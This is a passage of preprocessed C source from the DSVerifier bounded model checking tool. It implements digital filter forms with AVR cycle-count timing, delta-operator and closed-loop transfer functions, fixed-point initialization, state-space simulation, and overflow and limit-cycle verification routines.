generic_timer += ((22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (8 * hw.assembly.std) + (1 * hw.assembly.sbci) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.sbc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
sum -= *a_ptr++ * *y_ptr--;
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (6 * hw.assembly.pop) + (1 * hw.assembly.ret));
return sum;
}
double generic_timing_double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli));
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
generic_timer += ((10 * hw.assembly.std) + (6 * hw.assembly.ldd) + (2 * hw.assembly.adiw));
generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
generic_timer += ((23 * hw.assembly.ldd) + (32 * hw.assembly.mov) + (9 * hw.assembly.std) + (2 * hw.assembly.subi) + (3 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (2 * hw.assembly.sbci) + (1 * hw.assembly.st) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge));
}
w[0] += x;
w_ptr = &w[0];
generic_timer += ((13 * hw.assembly.ldd) + (12 * hw.assembly.mov) + (5 * hw.assembly.std) + (1 * hw.assembly.st) + (1 * hw.assembly.ld) + (1 * hw.assembly.rcall));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (10 * hw.assembly.std) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (1 * hw.assembly.adiw) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (8 * hw.assembly.pop) + (1 * hw.assembly.ret));
return sum;
}
double generic_timing_double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
generic_timer += ((8 * hw.assembly.push) + (14 * hw.assembly.std) + (3 * hw.assembly.out) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli));
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
generic_timer += ((15 * hw.assembly.std) + (22 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.rcall) + (2 * hw.assembly.ld) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.brge) + (1 * hw.assembly.adiw));
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
generic_timer += ((70 * hw.assembly.mov) + (65 * hw.assembly.ldd) + (12 * hw.assembly.lsl) + (12 * hw.assembly.rol) + (15 * hw.assembly.std) + (6 * hw.assembly.add) + (6 * hw.assembly.adc) + (2 * hw.assembly.adiw) + (3 * hw.assembly.cpc) + (3 * hw.assembly.cp) + (5 * hw.assembly.ld) + (4 * hw.assembly.rcall) + (5 * hw.assembly.subi) + (3 * hw.assembly.rjmp) + (2 * hw.assembly.brlt) + (3 * hw.assembly.st) + (2 * hw.assembly.sbci) + (3 * hw.assembly.sbc) + (1 * hw.assembly.brge));
}
generic_timer += ((4 * hw.assembly.ldd) + (4 * hw.assembly.mov) + (8 * hw.assembly.pop) + (3 * hw.assembly.out) + (1 * hw.assembly.in) + (1 * hw.assembly.cli) + (1 * hw.assembly.adiw) + (1 * hw.assembly.ret));
return yout;
}
void double_direct_form_1_impl2(double x[], int x_size, double b[], int b_size, double a[], int a_size, double y[]){
int i = 0; int j = 0;
double v[x_size];
for(i = 0; i < x_size; i++){
v[i] = 0;
for(j = 0; j < b_size; j++){
if (j > i) break;
v[i] = v[i] + x[i-j] * b[j];
}
}
y[0] = v[0];
for(i = 1; i < x_size; i++){
y[i] = 0;
y[i] = y[i] + v[i];
for(j = 1; j < a_size; j++){
if (j > i) break;
y[i] = y[i] + y[i-j] * ((-1) * a[j]);
}
}
}
void fxp_direct_form_1_impl2(fxp_t x[], int x_size, fxp_t b[], int b_size, fxp_t a[], int a_size, fxp_t y[]){
int i = 0; int j = 0;
fxp_t v[x_size];
for(i = 0; i < x_size; i++){
v[i] = 0;
for(j = 0; j < b_size; j++){
if (j > i) break;
v[i] = fxp_add(v[i], fxp_mult(x[i-j], b[j]));
}
}
y[0] = v[0];
for(i = 1; i < x_size; i++){
y[i] = 0;
y[i] = fxp_add(y[i], v[i]);
for(j = 1; j < a_size; j++){
if (j > i) break;
y[i] = fxp_add(y[i], fxp_mult(y[i-j] , -a[j]));
}
}
}
# 26 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h"
# 1 "/usr/include/assert.h" 1 3 4
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2
# 1 "/usr/include/assert.h" 1 3 4
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/delta-operator.h" 2
int nchoosek(int n, int k){
if (k == 0)
return 1;
return (n * nchoosek(n - 1, k - 1)) / k;
}
void generate_delta_coefficients(double vetor[], double out[], int n, double delta){
int i,j;
int N = n - 1;
double sum_delta_operator;
for(i=0; i<=N; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + vetor[j]*nchoosek(N-j,i-j);
}
out[i] = internal_pow(delta,N-i)*sum_delta_operator;
}
}
void get_delta_transfer_function(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){
generate_delta_coefficients(b, b_out, b_size, delta);
generate_delta_coefficients(a, a_out, a_size, delta);
}
void get_delta_transfer_function_with_base(double b[], double b_out[], int b_size, double a[], double a_out[], int a_size, double delta){
int i,j;
int N = a_size - 1;
int M = b_size - 1;
double sum_delta_operator;
for(i=0; i<=N; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + a[j]*nchoosek(N-j,i-j);
}
a_out[i] = internal_pow(delta,N-i)*sum_delta_operator;
}
for(i=0; i<=M; i++)
{
sum_delta_operator = 0;
for(j=0; j<=i; j++)
{
sum_delta_operator = sum_delta_operator + b[j]*nchoosek(M-j,i-j);
}
b_out[i] = internal_pow(delta,M-i)*sum_delta_operator;
}
}
# 27 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h" 1
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/closed-loop.h"
void ft_closedloop_series(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
Nans_num = Nc_num + Nmodel_num - 1;
Nans_den = Nc_den + Nmodel_den - 1 ;
double den_mult [Nans_den];
poly_mult(c_num, Nc_num, model_num, Nmodel_num, ans_num, Nans_num);
poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den );
poly_sum(ans_num, Nans_num , den_mult, Nans_den , ans_den, Nans_den);
}
void ft_closedloop_sensitivity(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
int Nans_num_p = Nc_num + Nmodel_num-1;
Nans_den = Nc_den + Nmodel_den-1;
Nans_num = Nc_den + Nmodel_den-1;
double num_mult [Nans_num_p];
poly_mult(c_den, Nc_den, model_den, Nmodel_den, ans_num, Nans_num);
poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nans_num_p);
poly_sum(ans_num, Nans_num, num_mult, Nans_num_p, ans_den, Nans_den);
}
void ft_closedloop_feedback(double c_num[], int Nc_num, double c_den[], int Nc_den, double model_num[], int Nmodel_num, double model_den[], int Nmodel_den, double ans_num[], int Nans_num, double ans_den[], int Nans_den){
Nans_num = Nc_den + Nmodel_num - 1;
Nans_den = Nc_den + Nmodel_den - 1;
int Nnum_mult = Nc_num + Nmodel_num - 1;
double den_mult [Nans_den];
double num_mult [Nnum_mult];
poly_mult(c_num, Nc_num, model_num, Nmodel_num, num_mult, Nnum_mult);
poly_mult(c_den, Nc_den, model_den, Nmodel_den, den_mult, Nans_den);
poly_sum(num_mult, Nnum_mult, den_mult, Nans_den, ans_den, Nans_den);
poly_mult(c_den, Nc_den, model_num, Nmodel_num, ans_num, Nans_num);
}
int check_stability_closedloop(double a[], int n, double plant_num[], int p_num_size, double plant_den[], int p_den_size){
int columns = n;
double m[2 * n - 1][n];
int i,j;
int first_is_positive = 0;
double * p_num = plant_num;
double * p_den = plant_den;
double sum = 0;
for (i=0; i < n; i++){
sum += a[i];
}
__DSVERIFIER_assert(sum > 0);
sum = 0;
for (i=0; i < n; i++){
sum += a[i] * internal_pow(-1, n-1-i);
}
sum = sum * internal_pow(-1, n-1);
__DSVERIFIER_assert(sum > 0);
__DSVERIFIER_assert(internal_abs(a[n-1]) < a[0]);
for (i=0; i < 2 * n - 1; i++){
for (j=0; j < columns; j++){
m[i][j] = 0;
if (i == 0){
m[i][j] = a[j];
continue;
}
if (i % 2 != 0 ){
int x;
for(x=0; x<columns;x++){
m[i][x] = m[i-1][columns-x-1];
}
columns = columns - 1;
j = columns;
}else{
__DSVERIFIER_assert(m[i-2][0] > 0);
m[i][j] = m[i-2][j] - (m[i-2][columns] / m[i-2][0]) * m[i-1][j];
__DSVERIFIER_assert((m[0][0] >= 0) && (m[i][0] >= 0));
}
}
}
return 1;
}
# 28 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
extern digital_system ds;
extern digital_system plant;
extern digital_system control;
extern implementation impl;
extern filter_parameters filter;
extern hardware hw;
void initialization(){
if (impl.frac_bits >= 32){
printf("impl.frac_bits must be less than word width!\n");
}
if (impl.int_bits >= 32 - impl.frac_bits){
printf("impl.int_bits must be less than word width subtracted by precision!\n");
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
((void) sizeof ((
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
0
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
0
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
) ; else __assert_fail (
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
"0"
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h", 33, __extension__ __PRETTY_FUNCTION__); }))
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
;
}
if(impl.frac_bits >= 31){
_fxp_one = 0x7fffffff;
}else{
_fxp_one = (0x00000001 << impl.frac_bits);
}
_fxp_half = (0x00000001 << (impl.frac_bits - 1));
_fxp_minus_one = -(0x00000001 << impl.frac_bits);
_fxp_min = -(0x00000001 << (impl.frac_bits + impl.int_bits - 1));
_fxp_max = (0x00000001 << (impl.frac_bits + impl.int_bits - 1)) - 1;
_fxp_fmask = ((((int32_t) 1) << impl.frac_bits) - 1);
_fxp_imask = ((0x80000000) >> (32 - impl.frac_bits - 1));
_dbl_min = _fxp_min;
_dbl_min /= (1 << impl.frac_bits);
_dbl_max = _fxp_max;
_dbl_max /= (1 << impl.frac_bits);
if ((impl.scale == 0) || (impl.scale == 1)){
impl.scale = 1;
return;
}
if (impl.min != 0){
impl.min = impl.min / impl.scale;
}
if (impl.max != 0){
impl.max = impl.max / impl.scale;
}
# 80 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/initialization.h"
}
# 29 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/state-space.h"
extern digital_system_state_space _controller;
extern int nStates;
extern int nInputs;
extern int nOutputs;
double double_state_space_representation(void){
double result1[4][4];
double result2[4][4];
int i, j;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
return _controller.outputs[0][0];
}
double fxp_state_space_representation(void){
fxp_t result1[4][4];
fxp_t result2[4][4];
int i, j;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
fxp_t A_fpx[4][4];
fxp_t B_fpx[4][4];
fxp_t C_fpx[4][4];
fxp_t D_fpx[4][4];
fxp_t states_fpx[4][4];
fxp_t inputs_fpx[4][4];
fxp_t outputs_fpx[4][4];
for(i=0; i<4;i++){
for(j=0; j<4;j++){
A_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
B_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
C_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
D_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
states_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
inputs_fpx[i][j]=0;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
outputs_fpx[i][j]=0;
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
A_fpx[i][j]= fxp_double_to_fxp(_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
B_fpx[i][j]= fxp_double_to_fxp(_controller.B[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
C_fpx[i][j]= fxp_double_to_fxp(_controller.C[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
D_fpx[i][j]= fxp_double_to_fxp(_controller.D[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
states_fpx[i][j]= fxp_double_to_fxp(_controller.states[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
inputs_fpx[i][j]= fxp_double_to_fxp(_controller.inputs[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
outputs_fpx[i][j]= fxp_double_to_fxp(_controller.outputs[i][j]);
}
}
fxp_matrix_multiplication(nOutputs,nStates,nStates,1,C_fpx,states_fpx,result1);
fxp_matrix_multiplication(nOutputs,nInputs,nInputs,1,D_fpx,inputs_fpx,result2);
fxp_add_matrix(nOutputs,
1,
result1,
result2,
outputs_fpx);
fxp_matrix_multiplication(nStates,nStates,nStates,1,A_fpx,states_fpx,result1);
fxp_matrix_multiplication(nStates,nInputs,nInputs,1,B_fpx,inputs_fpx,result2);
fxp_add_matrix(nStates,
1,
result1,
result2,
states_fpx);
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= fxp_to_double(states_fpx[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
_controller.outputs[i][j]= fxp_to_double(outputs_fpx[i][j]);
}
}
return _controller.outputs[0][0];
}
# 30 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/filter_functions.h"
double sinTyl(double x, int precision){
double sine;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
sine = aux;
if (precision >= 1)
{
aux = x;
sine += aux;
if (precision >= 2)
{
aux = aux*xsquared;
sine -= aux/6;
if (precision >= 3)
{
aux = aux*xsquared;
sine +=aux/120;
if(precision >=4)
{
aux = aux*xsquared;
sine -=aux/5040;
if(precision >= 5)
{
aux = aux*xsquared;
sine +=aux/362880;
if(precision >= 6)
{
aux = aux*xsquared;
sine -=aux/39916800;
if (precision >= 7)
printf("Warning: Function sinTyl "
"from bmc/core/filter_functions.h: Precision "
"representation exceeded. Assuming maximum precision of 6\n");
}
}
}
}
}
}
}
return sine;
}
double cosTyl(double x, int precision){
double cosine;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function cosTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
cosine = aux;
if (precision >= 1)
{
aux = 1;
cosine = 1;
if (precision >= 2)
{
aux = xsquared;
cosine -= aux/2;
if (precision >= 3)
{
aux = aux*xsquared;
cosine += aux/24;
if(precision >=4)
{
aux = aux*xsquared;
cosine -=aux/720;
if(precision >= 5)
{
aux = aux*xsquared;
cosine +=aux/40320;
if(precision >= 6)
{
aux = aux*xsquared;
cosine -=aux/3628800;
if (precision >= 7) printf("Warning: Function sinTyl "
"from bmc/core/filter_functions.h: Precision "
"representation exceeded. Assuming maximum precision of 6\n");
}
}
}
}
}
}
}
return cosine;
}
double atanTyl(double x, int precision){
double atangent;
double xsquared = x*x;
double aux;
if (precision < 0)
{
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision must be a positive integer. Assuming 0 precision\n");
precision = 0;
}
if (precision >= 0)
{
aux = 0;
atangent = aux;
if (precision >= 1)
{
aux = x;
atangent = aux;
if (precision >= 2)
{
aux = xsquared;
atangent -= aux/3;
if (precision >= 3)
{
aux = aux*xsquared;
atangent += aux/5;
if(precision >=4)
{
aux = aux*xsquared;
atangent -=aux/7;
if (precision >= 7)
printf("Warning: Function sinTyl from bmc/core/filter_functions.h: "
"Precision representation exceeded. Assuming maximum precision of 4\n");
}
}
}
}
}
return atangent;
}
float sqrt1(const float x)
{
const float xhalf = 0.5f*x;
union
{
float x;
int i;
} u;
u.x = x;
u.i = 0x5f3759df - (u.i >> 1);
return x*u.x*(1.5f - xhalf*u.x*u.x);
}
float sqrt2(const float x)
{
union
{
int i;
float x;
} u;
u.x = x;
u.i = (1<<29) + (u.i >> 1) - (1<<22);
return u.x;
}
float fabsolut(float x)
{
if (x < 0)
x = -x;
return x;
}
static float sqrt3(float val)
{
float x = val/10;
float dx;
double diff;
double min_tol = 0.00001;
int i, flag;
flag = 0;
if (val == 0 ) x = 0;
else
{
for (i=1;i<20;i++)
{
if (!flag)
{
dx = (val - (x*x)) / (2.0 * x);
x = x + dx;
diff = val - (x*x);
if (fabsolut(diff) <= min_tol) flag = 1;
}
else x =x;
}
}
return (x);
}
# 31 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
int verify_overflow(void) {
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 73 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_int();
__DSVERIFIER_assume(x[i] >= min_fxp && x[i] <= max_fxp);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for (i = 0; i < X_SIZE_VALUE; ++i) {
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 174 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_overflow.h"
}
overflow_mode = 1;
fxp_verify_overflow_array(y, X_SIZE_VALUE);
return 0;
}
# 33 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 1
# 15 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
extern digital_system ds;
extern implementation impl;
extern digital_system_state_space _controller;
extern int nStates;
extern int nInputs;
extern int nOutputs;
int verify_limit_cycle_state_space(void){
double stateMatrix[4][4];
double outputMatrix[4][4];
double arrayLimitCycle[4];
double result1[4][4];
double result2[4][4];
int i, j, k;
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
stateMatrix[i][j]=0;
outputMatrix[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
k = 0;
for (i = 1; i < 0; i++) {
double_matrix_multiplication(nStates,nStates,nStates,1,_controller.A,_controller.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller.B,_controller.inputs,result2);
double_add_matrix(nStates,
1,
result1,
result2,
_controller.states);
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller.C,_controller.states,result1);
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller.D,_controller.inputs,result2);
double_add_matrix(nOutputs,
1,
result1,
result2,
_controller.outputs);
int l;
for(l = 0; l < nStates; l++){
stateMatrix[l][k] = _controller.states[l][0];
}
for(l = 0; l < nOutputs; l++){
stateMatrix[l][k] = _controller.outputs[l][0];
}
k++;
}
printf("#matrix STATES -------------------------------");
print_matrix(stateMatrix,nStates,0);
printf("#matrix OUTPUTS -------------------------------");
print_matrix(outputMatrix,nOutputs,0);
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
((void) sizeof ((
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ; else __assert_fail (
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
"0"
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 93, __extension__ __PRETTY_FUNCTION__); }))
# 93 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
;
for(i=0; i<nStates;i++){
for(j=0; j<0;j++){
arrayLimitCycle[j] = stateMatrix[i][j];
}
double_check_persistent_limit_cycle(arrayLimitCycle,0);
}
for(i=0; i<nOutputs;i++){
for(j=0; j<0;j++){
arrayLimitCycle[j] = outputMatrix[i][j];
}
double_check_persistent_limit_cycle(arrayLimitCycle,0);
}
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
((void) sizeof ((
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
0
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
) ; else __assert_fail (
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
"0"
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h", 110, __extension__ __PRETTY_FUNCTION__); }))
# 110 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle.h"
;
}
int verify_limit_cycle(void){
overflow_mode = 3;
int i;
int Set_xsize_at_least_two_times_Na = 2 * ds.a_size;
printf("X_SIZE must be at least 2 * ds.a_size");
